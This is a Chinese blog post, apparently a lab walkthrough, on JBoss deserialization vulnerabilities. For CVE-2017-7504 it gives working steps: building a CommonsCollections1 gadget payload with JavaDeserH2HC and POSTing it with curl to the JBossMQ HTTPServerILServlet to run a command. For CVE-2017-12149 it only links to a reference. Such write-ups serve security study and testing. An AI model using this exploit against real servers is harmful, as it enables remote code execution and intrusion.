JBOSS漏洞集

Jboss介绍

是一个基于J2EE的开放源代码的应用服务器。 JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。

CVE-2017-7504漏洞

漏洞介绍

影响版本:JBoss AS 4.x及之前版本
漏洞存在点:http://172.20.10.13:8080/jbossmq-httpil/HTTPServerILServlet
在这里插入图片描述
JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞

漏洞利用

在这里插入图片描述
使用工具JavaDeserH2HC(下载链接)
我们这里使用的是ExampleCommonsCollections1WithHashMap
javac -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap.java
编译
在这里插入图片描述
java -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap "touch /tmp/success"
生成恶意的序列化数据,执行命令(创建文件夹)
在这里插入图片描述
curl http://172.20.10.13:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @ExampleCommonsCollections1WithHashMap.ser

##--data-binaryHTTP POST请求中的数据为纯二进制数据@[file_name]保留文件中的回车符和换行符,不做任何转换

将生成的数据文件ExampleCommonsCollections1WithHashMap.ser传给http://172.20.10.13:8080/jbossmq-httpil/HTTPServerILServlet
在这里插入图片描述
在这里插入图片描述
成功执行

JBoss 5.x/6.x 反序列化漏洞(CVE-2017-12149)

漏洞介绍

该漏洞出现在/invoker/readonly请求中,服务器将用户提交的POST内容进行了Java反序列化
在这里插入图片描述

影响版本

JBoss 5.x/6.x

漏洞利用

参考文章:
https://github.com/vulhub/vulhub/tree/master/jboss/CVE-2017-12149

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值